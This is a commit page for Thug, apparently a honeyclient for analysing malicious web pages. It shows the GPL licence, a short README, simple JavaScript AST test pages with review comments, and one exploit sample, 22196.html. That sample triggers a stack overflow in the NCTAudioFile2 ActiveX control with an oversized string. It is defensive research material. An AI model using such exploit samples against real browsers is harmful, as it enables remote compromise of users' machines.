
First commit

0 parents commit 82c455dbe44bc1688622a1b606ebac7198b8c2e7 @buffer committed May 8, 2011
Showing with 9,108 additions and 0 deletions.
  1. +340 −0 COPYING
  2. +36 −0 README
  3. +15 −0 samples/AST/test1.html
  4. +20 −0 samples/AST/test2.html
  5. +23 −0 samples/AST/test3.html
  6. +51 −0 samples/AST/test99.html
  7. +18 −0 samples/exploits/22196.html
  8. +28 −0 samples/exploits/22811_Elazar.html
  9. +67 −0 samples/exploits/2448.html
  10. +47 −0 samples/exploits/2575.html
  11. +47 −0 samples/exploits/2mix.html
  12. +38 −0 samples/exploits/3420.html
  13. BIN samples/exploits/36488084.sc
  14. BIN samples/exploits/39973780.sc
  15. +44 −0 samples/exploits/4042.html
  16. +32 −0 samples/exploits/4043.html
  17. +24 −0 samples/exploits/4148.html
  18. +76 −0 samples/exploits/4149.html
  19. +131 −0 samples/exploits/4158.html
  20. +40 −0 samples/exploits/4226.html
  21. +19 −0 samples/exploits/4230.html
  22. +17 −0 samples/exploits/4237.html
  23. +50 −0 samples/exploits/4250.html
  24. +49 −0 samples/exploits/4351.html
  25. +56 −0 samples/exploits/4420.html
  26. +29 −0 samples/exploits/4427.html
  27. +44 −0 samples/exploits/4594.html
  28. +20 −0 samples/exploits/4613.html
  29. +59 −0 samples/exploits/4663.html
  30. +39 −0 samples/exploits/4829.html
  31. +30 −0 samples/exploits/4869.html
  32. +44 −0 samples/exploits/4874.html
  33. +33 −0 samples/exploits/4875.html
  34. +71 −0 samples/exploits/4894.html
  35. +31 −0 samples/exploits/4903.html
  36. +35 −0 samples/exploits/4909.html
  37. +79 −0 samples/exploits/4918.html
  38. +82 −0 samples/exploits/4932.html
  39. +120 −0 samples/exploits/4967.html
  40. +21 −0 samples/exploits/4974.html
  41. +120 −0 samples/exploits/4979.html
  42. +120 −0 samples/exploits/4982.html
  43. +33 −0 samples/exploits/4986.html
  44. +118 −0 samples/exploits/4987.html
  45. +121 −0 samples/exploits/5025.html
  46. +49 −0 samples/exploits/5043.html
  47. +37 −0 samples/exploits/5045.html
  48. +132 −0 samples/exploits/5049.html
  49. +121 −0 samples/exploits/5051.html
  50. +119 −0 samples/exploits/5052.html
  51. +37 −0 samples/exploits/5153.html
  52. +31 −0 samples/exploits/5188.html
  53. +118 −0 samples/exploits/5190.html
  54. +75 −0 samples/exploits/5193.html
  55. +122 −0 samples/exploits/5205.html
  56. +22 −0 samples/exploits/5217.html
  57. +70 −0 samples/exploits/5225.html
  58. +69 −0 samples/exploits/5264.html
  59. +69 −0 samples/exploits/5271.html
  60. +50 −0 samples/exploits/5272.html
  61. +355 −0 samples/exploits/55875.html
  62. +69 −0 samples/exploits/ARCserve_AddColumn_BoF.html
  63. +101 −0 samples/exploits/AnswerWorks.htm
  64. +15 −0 samples/exploits/BaiduBar.htm
  65. +20 −0 samples/exploits/BitDefender.htm
  66. +33 −0 samples/exploits/CABrightStor.htm
  67. +9 −0 samples/exploits/CVE-2008-1309-Real.html
  68. +11 −0 samples/exploits/Comodo.htm
  69. +64 −0 samples/exploits/ConnectAndEnterRoom.htm
  70. +27 −0 samples/exploits/CreativeSoftAttack.htm
  71. +50 −0 samples/exploits/DLinkMPEG.htm
  72. +18 −0 samples/exploits/DPClient.htm
  73. +20 −0 samples/exploits/DVRHOSTWeb.htm
  74. +25 −0 samples/exploits/DirectShow.htm
  75. +16 −0 samples/exploits/DivX.htm
  76. +142 −0 samples/exploits/Domino.htm
  77. +107 −0 samples/exploits/FileUploader.htm
  78. +62 −0 samples/exploits/GLIEDown2.htm
  79. +19 −0 samples/exploits/GatewayWeblaunch.htm
  80. +15 −0 samples/exploits/GomWeb.htm
  81. +19 −0 samples/exploits/HPInfo_GetRegValue.htm
  82. +29 −0 samples/exploits/HPInfo_LaunchApp.htm
  83. +23 −0 samples/exploits/HPInfo_SetRegValue.htm
  84. +35 −0 samples/exploits/IMWebControl.htm
  85. +29 −0 samples/exploits/JetAudioDownloadFromMusicStore.htm
  86. +9 −0 samples/exploits/Kingsoft.htm
  87. +13 −0 samples/exploits/MacrovisionFlexNet.htm
  88. +59 −0 samples/exploits/MicrosoftWorks7Attack.htm
  89. +113 −0 samples/exploits/Move.htm
  90. +110 −0 samples/exploits/MyspaceUploader.htm
  91. +54 −0 samples/exploits/NCTAudioFile2.htm
  92. +23 −0 samples/exploits/NamoInstaller.htm
  93. +93 −0 samples/exploits/NeoTracePro.htm
  94. +32 −0 samples/exploits/NessusScanCtrl.htm
  95. +58 −0 samples/exploits/OurgameGLWorld.htm
  96. +16 −0 samples/exploits/OurgameGLWorld.html
  97. +57 −0 samples/exploits/PPlayer.htm
  98. +61 −0 samples/exploits/PTZCamPanel.htm
  99. +301 −0 samples/exploits/Pps.html
  100. +108 −0 samples/exploits/QuantumStreaming.htm
  101. +37 −0 samples/exploits/RDSDataSpace.htm
  102. +16 −0 samples/exploits/RediffBolDownloaderAttack.htm
  103. +14 −0 samples/exploits/RegistryPro.htm
  104. +50 −0 samples/exploits/RtspVaPgCtrl.htm
  105. +13 −0 samples/exploits/SSReaderPdg2_LoadPage.htm
  106. +43 −0 samples/exploits/SSReaderPdg2_Register.htm
  107. +11 −0 samples/exploits/SinaDLoader.htm
  108. +24 −0 samples/exploits/SonicWallNetExtenderAddRouteEntry.htm
  109. +32 −0 samples/exploits/StormConfig.htm
  110. +56 −0 samples/exploits/StreamAudioChainCast.htm
  111. +121 −0 samples/exploits/SymantecBackupExec.htm
  112. +54 −0 samples/exploits/Toshiba.htm
  113. +15 −0 samples/exploits/UUSeeUpdate.htm
  114. +23 −0 samples/exploits/UniversalUpload.htm
  115. +37 −0 samples/exploits/VLC.htm
  116. +64 −0 samples/exploits/WMEncProfileManager.htm
  117. +53 −0 samples/exploits/WinZip.htm
  118. +20 −0 samples/exploits/Xupload.htm
  119. +118 −0 samples/exploits/YahooJukebox.htm
  120. +48 −0 samples/exploits/YahooMessengerYVerInfo.htm
  121. +43 −0 samples/exploits/YahooMessengerYwcvwr_GetComponentVersion.htm
  122. +31 −0 samples/exploits/YahooMessengerYwcvwr_server.htm
  123. +33 −0 samples/exploits/ZenturiProgramCheckerAttack.htm
  124. +19 −0 samples/exploits/aol_ampx.html
  125. +1 −0 samples/exploits/bindshell.sc
  126. +23 −0 samples/exploits/domino.html
  127. +34 −0 samples/exploits/gom.html
  128. +32 −0 samples/exploits/hpinfo.html
  129. +36 −0 samples/exploits/hpinfo1.html
  130. +28 −0 samples/exploits/hpinfo2.html
  131. +19 −0 samples/exploits/hpinfo3.html
  132. +27 −0 samples/exploits/hpupdate1.html
  133. +87 −0 samples/exploits/hpupdate2.html
  134. +33 −0 samples/exploits/inner_html_example.html
  135. +168 −0 samples/exploits/intuit.html
  136. +24 −0 samples/exploits/ms09002-mod.html
  137. +10 −0 samples/exploits/msrichtxt.html
  138. +66 −0 samples/exploits/qvod.html
  139. +26 −0 samples/exploits/qvod.js
  140. +52 −0 samples/exploits/qvodctl-2.html
  141. +11 −0 samples/exploits/qvodctl.html
  142. +42 −0 samples/exploits/qvodsrc.html
  143. +87 −0 samples/exploits/realplayer-mod.html
  144. +110 −0 samples/exploits/rgod_imesh.html
  145. +1 −0 samples/exploits/runcalc.sc
  146. +58 −0 samples/exploits/show-283-1.html
  147. +42 −0 samples/exploits/ssreader2.html
  148. +48 −0 samples/exploits/ssreader_0day.html
  149. +42 −0 samples/exploits/ssreader_noplus.html
  150. +15 −0 samples/exploits/storm_URL.htm
  151. +15 −0 samples/exploits/storm_advancedOpen.htm
  152. +15 −0 samples/exploits/storm_backImage.htm
  153. +15 −0 samples/exploits/storm_isDVDPath.htm
  154. +23 −0 samples/exploits/storm_nov10.html
  155. +15 −0 samples/exploits/storm_rawParse.htm
  156. +15 −0 samples/exploits/storm_titleImage.htm
  157. +79 −0 samples/exploits/stormplayer.html
  158. +227 −0 samples/exploits/testEvents.html
  159. +63 −0 samples/exploits/toshiba.html
  160. +100 −0 samples/exploits/xupload-2.html
  161. +22 −0 samples/exploits/xupload.html
  162. +185 −0 src/AST/AST.py
  163. +179 −0 src/AST/JavaScript.tokens
340 COPYING
@@ -0,0 +1,340 @@
+
+ GNU GENERAL PUBLIC LICENSE
+ Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.
+ 59 Temple Place, Suite 330, Boston, MA 02111 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+ Preamble
+
+ The licenses for most software are designed to take away your
+freedom to share and change it. By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users. This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it. (Some other Free Software Foundation software is covered by
+the GNU Library General Public License instead.) You can apply it to
+your programs, too.
+
+ When we speak of free software, we are referring to freedom, not
+price. Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+ To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+ For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have. You must make sure that they, too, receive or can get the
+source code. And you must show them these terms so they know their
+rights.
+
+ We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+ Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software. If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+ Finally, any free program is threatened constantly by software
+patents. We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary. To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+ The precise terms and conditions for copying, distribution and
+modification follow.
+
+ GNU GENERAL PUBLIC LICENSE
+ TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+ 0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License. The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language. (Hereinafter, translation is included without limitation in
+the term "modification".) Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope. The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+ 1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+ 2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+ a) You must cause the modified files to carry prominent notices
+ stating that you changed the files and the date of any change.
+
+ b) You must cause any work that you distribute or publish, that in
+ whole or in part contains or is derived from the Program or any
+ part thereof, to be licensed as a whole at no charge to all third
+ parties under the terms of this License.
+
+ c) If the modified program normally reads commands interactively
+ when run, you must cause it, when started running for such
+ interactive use in the most ordinary way, to print or display an
+ announcement including an appropriate copyright notice and a
+ notice that there is no warranty (or else, saying that you provide
+ a warranty) and that users may redistribute the program under
+ these conditions, and telling the user how to view a copy of this
+ License. (Exception: if the Program itself is interactive but
+ does not normally print such an announcement, your work based on
+ the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole. If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works. But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+ 3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+ a) Accompany it with the complete corresponding machine-readable
+ source code, which must be distributed under the terms of Sections
+ 1 and 2 above on a medium customarily used for software interchange; or,
+
+ b) Accompany it with a written offer, valid for at least three
+ years, to give any third party, for a charge no more than your
+ cost of physically performing source distribution, a complete
+ machine-readable copy of the corresponding source code, to be
+ distributed under the terms of Sections 1 and 2 above on a medium
+ customarily used for software interchange; or,
+
+ c) Accompany it with the information you received as to the offer
+ to distribute corresponding source code. (This alternative is
+ allowed only for noncommercial distribution and only if you
+ received the program in object code or executable form with such
+ an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it. For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable. However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+ 4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License. Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+ 5. You are not required to accept this License, since you have not
+signed it. However, nothing else grants you permission to modify or
+distribute the Program or its derivative works. These actions are
+prohibited by law if you do not accept this License. Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+ 6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions. You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+ 7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License. If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all. For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices. Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+ 8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded. In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+ 9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time. Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number. If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation. If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+ 10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission. For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this. Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+ NO WARRANTY
+
+ 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+ 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+ END OF TERMS AND CONDITIONS
+
+ Appendix: How to Apply These Terms to Your New Programs
+
+ If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+ To do so, attach the following notices to the program. It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+ <one line to give the program's name and a brief idea of what it does.>
+ Copyright (C) 19yy <name of author>
+
+ This program is free software; you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation; either version 2 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program; if not, write to the Free Software
+ Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111 USA
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+ Gnomovision version 69, Copyright (C) 19yy name of author
+ Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+ This is free software, and you are welcome to redistribute it
+ under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License. Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary. Here is a sample; alter the names:
+
+ Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+ `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+ <signature of Ty Coon>, 1 April 1989
+ Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs. If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library. If this is what you want to do, use the GNU Library General
+Public License instead of this License.
36 README
@@ -0,0 +1,36 @@
+
+Thug
+====
+
+
+Requirements
+============
+
+- Python 2.5 or later
+ http://www.python.org/
+- Google V8
+ http://code.google.com/p/v8/
+- PyV8
+ http://code.google.com/p/pyv8/
+- Libemu
+ http://libemu.carnivore.it/
+- Pylibemu
+ https://github.com/buffer/pylibemu
+
+
+Installation
+============
+
+
+Usage
+=====
+
+
+License information
+===================
+
+Copyright (C) 2011 Angelo Dell'Aera <buffer@antifork.org>
+
+License: GNU Lesser General Public License, version 3 or later; see COPYING.txt
+ included in this archive for details.
+
15 samples/AST/test1.html
@@ -0,0 +1,15 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+var s = "foo";
+var i = 10;
+
+</script>
+</head>
+
+<body>
+<p>AST Test 1</p>
+</body>
+</html>
20 samples/AST/test2.html
@@ -0,0 +1,20 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 10;
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+<p>AST Test 1</p>
+</body>
+</html>
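Review bot: The body label near the end of this section still reads `<p>AST Test 1</p>` even though the fixture is test2.html, so it appears to have been copied from test1.html without the label being updated. If the paragraph is meant to identify which fixture produced a rendered page, `<p>AST Test 2</p>` is the intended text; if the AST walker ignores body content entirely, the label is harmless but misleading to whoever opens the file.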
23 samples/AST/test3.html
@@ -0,0 +1,23 @@
+<html>
+<head>
+
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 0;
+
+ for (i = 0; i < 3; i++) {
+ s += "a";
+ }
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+</body>
+</html>
51 samples/AST/test99.html
@@ -0,0 +1,51 @@
+<html>
+<head>
+
+<title>onload test</title>
+<script type="text/javascript">
+
+function my_func(t)
+{
+ var s = "foo";
+ var i = 10;
+ var j = 0;
+ var ar = Array('a', 'b', 'c');
+ s += "bar";
+ i = i - 6;
+
+ if (i > 100) {
+ alert("Mmmmh");
+ }
+
+ for (i = 0; i < 3; i++) {
+ s += "a";
+ }
+
+ do {
+ s += "b";
+ j += 2;
+ i--;
+ } while (i > 1);
+
+ while (t > 0) {
+ s += "c";
+ t--;
+ }
+
+ for (a in ar) {
+ alert(a);
+ }
+
+ alert(s);
+ return 0;
+}
+
+my_func(3);
+
+</script>
+</head>
+
+<body>
+<p>The load event fires when the document has finished loading!</p>
+</body>
+</html>
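Review bot: The loop variable in `for (a in ar)` is never declared, so `a` becomes an implicit global, unlike `s`, `i` and `j`, which are declared with `var` at the top of my_func. If the fixture is meant to exercise the parser on a declared for-in variable, `for (var a in ar)` matches the form the other loops use; if the undeclared form is intentional as an AST case, a short comment saying so would keep it from being "fixed" later. Separately, the title says "onload test" and the body text describes the load event, but no onload handler is attached anywhere in the file — my_func is invoked directly from the script block, so the title and body text do not describe what the fixture does.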
18 samples/exploits/22196.html
@@ -0,0 +1,18 @@
+<html>
+<head>
+<title> PoC 79 Exe's / IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overfl0w By InTeL </title>
+<!-- via http://downloads.securityfocus.com/vulnerabilities/exploits/22196.c -->
+</head>
+
+<body>
+<object classid="clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC" id="pwnage">
+</object>
+<script>
+
+pwnage.SetFormatLikeSample("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA